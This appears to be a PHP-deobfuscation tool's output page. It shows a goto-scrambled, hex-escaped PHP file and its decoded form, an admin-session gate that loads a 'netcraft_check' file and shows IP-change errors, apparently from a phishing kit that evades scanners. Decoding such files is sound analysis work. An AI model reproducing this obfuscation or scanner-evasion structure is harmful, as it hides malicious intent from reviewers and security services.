Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto OuZaY; tqjp_: include "\56\56\x2f\166\x65\x6e\144\157\x72\x2f\61\x30\x30\56\x..
Decoded Output download
<?php
goto OuZaY; tqjp_: include "../vendor/100.php"; goto wWBtR; wWBtR: require "../vendor/200.php"; goto yIpfa; r1s6H: include "../vendor/index.php"; goto OViNQ; OuZaY: require "../../CONFIG.php"; goto BEFvw; yIpfa: require "../vendor/300.php"; goto r1s6H; OViNQ: require "../vendor/netcraft_check.php"; goto xDkhx; xjYxd: if ($Multiple_Admins == "on") { if ($_SESSION["admin_logged"] != "true" || !in_array($_SESSION["log_owner"], $Admin_Usernames)) { echo "<script>Page error! Change IP or check Allowed admins</script>"; header("location:./"); } } else { if ($_SESSION["admin_logged"] != "true") { echo "<script>Page error! Change IP</script>"; header("location:./"); } else { } } goto ZPm23; BEFvw: require "../partial/margin.php"; goto tqjp_; xDkhx: session_start(); goto xjYxd; ZPm23: ?>
Did this file decode correctly?
Original Code
<?php
goto OuZaY; tqjp_: include "\56\56\x2f\166\x65\x6e\144\157\x72\x2f\61\x30\x30\56\x70\150\160"; goto wWBtR; wWBtR: require "\56\56\x2f\x76\145\156\x64\157\x72\57\x32\x30\x30\56\160\x68\160"; goto yIpfa; r1s6H: include "\56\x2e\x2f\x76\145\156\x64\157\162\57\151\x6e\x64\x65\x78\x2e\160\x68\160"; goto OViNQ; OuZaY: require "\x2e\56\57\56\56\x2f\x43\117\x4e\x46\111\107\x2e\x70\x68\160"; goto BEFvw; yIpfa: require "\x2e\56\x2f\166\145\x6e\x64\x6f\162\x2f\x33\60\60\x2e\160\150\160"; goto r1s6H; OViNQ: require "\x2e\56\x2f\x76\x65\x6e\144\157\x72\57\156\145\x74\143\x72\x61\x66\x74\x5f\x63\150\x65\143\x6b\x2e\160\150\x70"; goto xDkhx; xjYxd: if ($Multiple_Admins == "\x6f\156") { if ($_SESSION["\141\x64\x6d\151\156\137\x6c\x6f\147\147\x65\144"] != "\x74\x72\165\145" || !in_array($_SESSION["\154\157\147\137\157\x77\x6e\x65\x72"], $Admin_Usernames)) { echo "\x3c\x73\x63\x72\151\x70\164\76\x50\141\x67\x65\40\145\162\x72\x6f\162\41\x20\103\x68\x61\156\147\x65\40\x49\x50\x20\157\x72\40\x63\x68\x65\143\x6b\40\101\x6c\154\x6f\167\145\144\x20\x61\144\x6d\x69\x6e\x73\74\x2f\x73\x63\162\151\x70\x74\76"; header("\x6c\x6f\x63\x61\164\151\x6f\x6e\x3a\56\x2f"); } } else { if ($_SESSION["\141\144\155\151\x6e\x5f\154\x6f\x67\x67\145\x64"] != "\x74\x72\165\145") { echo "\x3c\x73\x63\162\x69\x70\164\x3e\x50\x61\147\145\40\145\162\x72\157\162\41\40\103\x68\x61\x6e\x67\x65\40\x49\x50\74\x2f\163\143\162\151\160\x74\76"; header("\154\x6f\x63\x61\x74\151\157\156\x3a\56\x2f"); } else { } } goto ZPm23; BEFvw: require "\x2e\56\57\x70\x61\162\x74\x69\x61\154\57\155\141\162\147\151\156\56\160\150\160"; goto tqjp_; xDkhx: session_start(); goto xjYxd; ZPm23: ?>
Function Calls
None |
Stats
MD5 | abc147940f1900f3849d1412fa98b10a |
Eval Count | 0 |
Decode Time | 47 ms |